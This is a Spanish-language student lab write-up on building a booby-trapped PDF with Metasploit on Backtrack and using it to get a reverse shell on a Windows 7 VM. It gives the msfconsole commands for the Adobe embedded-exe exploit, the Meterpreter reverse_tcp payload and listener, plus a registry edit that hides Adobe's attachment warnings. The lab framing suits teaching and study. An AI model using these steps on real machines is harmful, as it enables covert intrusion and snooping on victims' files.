8
HACKING BACKTRACK 1 OBJETIVO DE LA PRÁCTICA Desearemos desde un PC atacante hacer una conexión remota a un PC víctima. Esta conexión será “malintencionada” y se realizará desde el puerto 4444 a través del Sistema Operativo Backtrack creando un archivo .PDF infectado y enviándolo al PC víctima. Una vez el PC victima abra el archivo, se abrirá un backdoor y desde el PC atacante podremos acceder a la Shell de la víctima y podremos visualizar todo su contenido. DETALLES A TENER EN CUENTA La realización de esta práctica ha supuesto unas complicaciones externas debido a algunos detalles que explicaremos a continuación. Trabajaremos con MSFConsole en el entorno Backtrack. Cuando se crea el PDF, tenemos que agregar la IP del Atacante en el comando lhost. La versión de Adobe Reader que debe tener el cliente será la 9.0. Se han editado los registros de Adobe Reader para permitir el uso del .exe. Se ignorará el hecho de realizar la conexión con el puerto 443. La víctima debe tener desactivado el Firewall.

Backtrack1_bis

Embed Size (px)

DESCRIPTION

Ver más en http://www.francescperez.net/templates/original/html/si/articulos/art_9_bac_rev_tcp.html

Citation preview

Page 1: Backtrack1_bis

HACKING BACKTRACK 1

OBJETIVO DE LA PRÁCTICA

Desearemos desde un PC atacante hacer una conexión remota a un PC víctima.

Esta conexión será “malintencionada” y se realizará desde el puerto 4444 a través del Sistema

Operativo Backtrack creando un archivo .PDF infectado y enviándolo al PC víctima.

Una vez el PC victima abra el archivo, se abrirá un backdoor y desde el PC atacante podremos

acceder a la Shell de la víctima y podremos visualizar todo su contenido.

DETALLES A TENER EN CUENTA

La realización de esta práctica ha supuesto unas complicaciones externas debido a algunos

detalles que explicaremos a continuación.

Trabajaremos con MSFConsole en el entorno Backtrack.

Cuando se crea el PDF, tenemos que agregar la IP del Atacante en el comando lhost.

La versión de Adobe Reader que debe tener el cliente será la 9.0.

Se han editado los registros de Adobe Reader para permitir el uso del .exe.

Se ignorará el hecho de realizar la conexión con el puerto 443.

La víctima debe tener desactivado el Firewall.

Page 2: Backtrack1_bis

ESQUEMA DE LA PRÁCTICA

Equipo atacante = 192.168.1.2

Equipo víctima = 192.168.1.3

Como podemos ver en el dibujo, ambos PCs deben estar conectados en la misma red para

realizarse el ataque. Para ello los hemos puesto a ambos en una VMnet juntos.

El Equipo víctima será quien tenga el .PDF infectado y quien será atacado por el equipo 1.2.

PROCEDIMIENTO DE LA PRÁCTICA

Para empezar la práctica, primero de todos tendremos que contar con un sistema operativo

llamado Backtrack, basado en distribuciones Linux. Este O.S. es una herramienta bastante

particular basada en este tipo de ejemplos y prácticas en cuanto a “jugar” con la red.

El primer paso será crear un archivo .PDF. Éste será la base de nuestro ataque. Gracias a él

podremos infectar a la víctima una vez abra el archivo que le enviaremos.

Abriremos la terminal del Backtrack y utilizaremos la MSFConsole. Esta consola se centra y

permite un acceso eficiente a las opciones relacionadas con los Exploits que se utilizarán.

Gracias a ésta, se facilita el uso de las herramientas.

Page 3: Backtrack1_bis

CREACIÓN DEL PDF…

A la hora de crear el PDF, tenemos que tener en cuenta los siguientes comandos (que

utilizaremos):

use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs.

Sirve para decirle que vamos a utilizer un exploit con Adobe PDF embedded y un .exe como

extensión.

set payload windows/meterpreter/reverse_tcp

Es el Payload, que nos devolverá un Meterpreter. El Payload traducido es la carga útil, es la

información del envío de datos que usaremos para el ataque.

set lhost 192.168.1.2.

Añadiremos la IP del Atacante.

set filename vellimalote.pdf

Crearemos un PDF con el nombre indicado.

Exploit

Cargaremos el exploit para que se cree.

Page 4: Backtrack1_bis

TRANSMISIÓN DEL ARCHIVO

Ahora, de cualquier forma tenemos que conseguir que la víctima reciba dicho archivo PDF

creado.

En este paso nosotros directamente lo hemos enviado o traspasado por un USB para facilitar el

uso de éste.

Localizaremos el archivo, en la ruta donde se ha guardado:

/msf4/local/vellimalote.pdf

*Hay dos archivos, vellimalo y vellimalote porque se hicieron varias pruebas. Pero el que nos

servirá y estamos utilizando es Vellimalote.pdf

Enviaremos el archivo a la máquina Windows 7, que será la víctima:

Hay que tener en cuenta, que la víctima debe tener un Adobe Reader inferior a la versión 9.3.

En nuestro caso utilizaremos la 9.0, que no dará muchos problemas a la hora de realizar la

apertura del archivo.

Page 5: Backtrack1_bis

DETALLES DE ADOBE READER

La realización de la práctica ha sido ardua básicamente por los permisos y versiones de Adobe

Reader.

Para que funcionara 100% hemos hecho unos cambios, encontrados en Internet.

Actualizar el registro de Adobe Reader.

Después de una búsqueda exhaustiva por Internet, muchos usuarios coincidían en que

el registro de Adobe Reader debía ser cambiado.

Para ello utilizaremos la herramienta de Windows, “regedit” y seguiremos la siguiente

ruta:

HKEY_LOCAL_Machine / Software / Policies / Adobe / Acrobat Reader / 9.0 /

FeatureLockDown / cDefaultLaunchAttachmentPerms

Una vez dentro, veremos esto:

Editaremos el registro “BuiltInPermList” y le quitaremos la extensión .exe.

De esta forma, cuando abramos el archivo PDF no nos surgirá ningún mensaje molesto

relacionado con la infección o el mal uso del archivo.

Page 6: Backtrack1_bis

EMPIEZA EL ATAQUE

Una vez solucionados todos los problemas con la víctima, realizaremos el ataque desde

nuestro atacante, valga la redundancia.

Utilizaremos los siguientes comandos:

Use exploit/multi/handler Utilizaremos el controlador del Exploit.

Set payload Windows/meterpreter/reverse_tcp Utilización del TCP (lo mismo que cuando creamos el PDF).

Set lhost 192.168.1.2 Agregamos la IP del atacante.

Exploit Arrancamos el exploit.

El ataque será enviado mediante escucha. Es decir, que cuando la víctima abra el archivo

infectado (enviado anteriormente, el PDF) será cuando el atacante podrá entrar en la Shell del

usuario y entonces el ataque habrá sido realizado correctamente.

Page 7: Backtrack1_bis

MODO ESCUCHA

La víctima abrirá el archivo PDF y comprobará que le sale una terminal extraña, que

desaparecerá al momento.

Cuando el usuario víctima ve esto, en la mayoría de los casos se despreocupa y sigue realizando

las tareas que estaba haciendo, pero realmente este ha sido el momento de infección, ya que el

atacante ha podido realizar la conexión.

El atacante estará esperando (modo escucha) y verá cómo se crea la conexión:

Page 8: Backtrack1_bis

Dentro del parámetro meterpreter, ponemos “Shell” para meternos dentro del PC de la

víctima, sin que éste se dé cuenta de nada.

Y como podemos ver, ya estamos dentro del Desktop de la víctima:

A partir de ahora podemos navegar por el PC de la víctima y realizar maldades o simplemente

ser un cotilla y ver toda la información que tiene el usuario.

José Mª Vellido – ASIX2M

Hacking Backtrack 1 – SEGDISP

Fran Pérez – 2013/2014